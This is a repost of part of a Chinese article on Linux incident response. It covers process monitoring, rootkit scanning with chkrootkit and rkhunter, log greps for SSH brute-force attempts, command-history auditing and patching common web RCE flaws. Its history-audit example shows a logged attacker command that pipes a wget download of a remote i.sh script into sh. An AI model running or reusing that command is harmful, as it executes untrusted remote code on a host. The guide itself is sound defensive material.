设为首页 - 加入收藏 ASP站长网(Aspzz.Cn)- 科技、建站、经验、云计算、5G、大数据,站长网!
热搜: 创业者 数据 手机
当前位置: 首页 > 服务器 > 搭建环境 > Windows > 正文

超全面的Linux应急响应技巧(2)

发布时间:2019-11-11 12:50 所属栏目:117 来源:深信服千里目安全实验室
导读:监控守护进程的行为:lsof-p[pid] strace-tt-T-etrace=all-p$pid 扫描是否存在恶意驱动 枚举/扫描系统驱动:lsmod 安装chkrootkit进行扫描: wgetftp://ftp.pangeia.com.br/pub/seg/pac/chkrootkit.tar.gztarzxvfch

监控守护进程的行为:lsof-p[pid]

超全面的Linux应急响应技巧

  1. strace-tt-T -etrace=all-p$pid 

扫描是否存在恶意驱动

枚举/扫描系统驱动:lsmod

安装chkrootkit进行扫描:

  1. wget ftp://ftp.pangeia.com.br/pub/seg/pac/chkrootkit.tar.gztar zxvf chkrootkit.tar.gzcd chkrootkit-0.52make sense./chkrootkit 

安装rkhunter进行扫描:

Wget https://nchc.dl.sourceforge.net/project/rkhunter/rkhunter/1.4.4/rkhunter-1.4.4.tar.gz

tar -zxvf rkhunter-1.4.4.tar.gz

cd rkhunter-1.4.4

./installer.sh --install

rkhunter -c

最后一个环节往往是大家比较容易遗忘的,Linux平台下90%的病毒是通过网络传播感染的,所以,你的主机之所以会感染病毒,大部分原因也是因为Web安全防护不够,赶紧检查一下。

修改SSH弱密码

查询log主机登陆日志:

  1. grep "Accepted " /var/log/secure* | awk '{print $1,$2,$3,$9,$11}' 

定位有爆破的源IP:

  1. grep "Failed password" /var/log/secure|grep -E -o "(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)"|uniq -c 

爆破日志的用户名密码:

  1. grep "Failed password" /var/log/secure|perl -e 'while($_=<>){ /for(.*?) from/; print "$1\n";}'|uniq -c|sort -nr 

SSH爆破是Linux病毒最常用的传播手段,若存在弱密码的主机很容易被其他感染主机SSH爆破成功,从而再次感染病毒。

添加命令审计

为历史的命令增加登录的IP地址、执行命令时间等信息:

[1]保存1万条命令:

  1. sed -i 's/^HISTSIZE=1000/HISTSIZE=10000/g' /etc/profile 

[2]在/etc/profile的文件尾部添加如下行数配置信息:

  1. USER_IP=`who -u am i 2>/dev/null | awk '{print $NF}' | sed -e 's/[()]//g'` 
  2. if [ "$USER_IP" = "" ] 
  3.  
  4. then 
  5.  
  6. USER_IP=`hostname` 
  7.  
  8. fi 
  9.  
  10. export HISTTIMEFORMAT="%F %T $USER_IP `whoami` " 
  11.  
  12. shopt -s histappend 
  13.  
  14. export PROMPT_COMMAND="history -a" 

[3]让配置生效:

  1. source /etc/profile 

生成效果:

  1. 762019-10-2817:05:34113.110.229.230 wget -q -T180 -O-<a href="http://103.219.112.66:8000/i.sh">http://103.219.112.66:8000/i.sh</a>) | sh 

打上常见Web漏洞补丁

  1. structs2系列RCE漏洞 
  2. thinkphp5.XRCE漏洞 
  3. Redis未授权访问漏洞 
  4. ConfluenceRCE漏洞(CVE_2019_3396) 
  5. DrupalRCE漏洞(CVE-2018-7600) 
  6. ThinkPHPRCE漏洞(CVE-2019-9082) 
结尾

Linux平台下的恶意软件威胁以僵尸网络蠕虫和挖矿病毒为主,由于Linux大多作为服务器暴露在公网,且Web应用的漏洞层出不穷,所以很容易被大范围入侵,如常见的病毒:DDG、systemdMiner、BillGates、watchdogs、XorDDos,在很多Linux上都有。大家要养成不使用弱密码、勤打补丁的好习惯。

【编辑推荐】

  1. 一些 Linux 系统故障修复和修复技巧
  2. 7件事,让你快速提高数据分析能力
  3. 官方爆料Deepin深度操作系统V20细节
  4. 中国信息协会信息安全专业委员会2019年年会暨首届中国数据安全和治理高峰论坛圆满落幕
  5. Linus TED 分享,Linux 背后的思想
【责任编辑:张燕妮 TEL:(010)68476606】
点赞 0

(编辑:ASP站长网)

网友评论
推荐文章
    热点阅读